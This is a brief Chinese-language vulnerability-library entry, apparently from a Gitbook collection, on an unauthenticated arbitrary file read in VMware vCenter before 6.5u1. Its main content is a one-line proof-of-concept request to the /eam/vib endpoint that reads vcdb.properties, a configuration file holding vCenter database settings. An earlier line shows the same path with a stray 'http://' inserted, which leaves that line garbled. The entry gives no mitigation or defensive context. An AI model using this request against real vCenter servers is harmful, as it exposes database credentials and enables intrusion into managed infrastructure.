VMware vCenter 未经身份验证任意文件读取漏洞 < 6.5u1

VMware vCenter 未经身份验证任意文件读取漏洞 < 6.5u1, VMware透露此漏洞已在6.5u1中修复,但未分配CVE。

$user/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\http://vcdb.properties

PoC

/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""